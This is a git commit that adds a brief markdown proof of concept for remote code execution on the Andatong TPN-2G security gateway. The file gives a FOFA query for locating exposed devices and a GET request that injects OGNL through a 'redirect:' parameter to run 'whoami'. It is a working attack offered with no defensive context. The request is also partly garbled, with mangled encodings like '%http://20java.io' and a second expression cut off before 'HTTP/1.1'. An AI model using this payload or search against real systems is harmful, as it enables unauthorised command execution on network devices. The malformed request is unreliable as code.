Create 安达通TPN-2G安全网关远程代码执行.md

2024-05-18 19:40:45 +08:00 · 2024-05-18 19:40:45 +08:00 · 718101b363
commit 718101b363
parent 9c71dcd405
1 changed files with 12 additions and 0 deletions
--- a/安达通TPN-2G安全网关远程代码执行.md
+++ b/安达通TPN-2G安全网关远程代码执行.md
@ -0,0 +1,12 @@
+## 安达通TPN-2G安全网关远程代码执行
+
+## fofa
+```
+ title="TPN-2G" || title="SJW74"
+```
+
+## poc
+```
+GET /lan/admin_getLisence?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami%22}).start().getInputStream(),%23b%3dnew%http://20java.io.InputStreamReader(%23a),%23c%3dnew%http://20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23screen.println(%23d),%23screen.close()}%22%3Etest.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22test%22}).start().getInputStream(),%23b%3dnew%http://20java.io.InputStreamReader(%23a),%23c%3dnew%20java HTTP/1.1
+
+```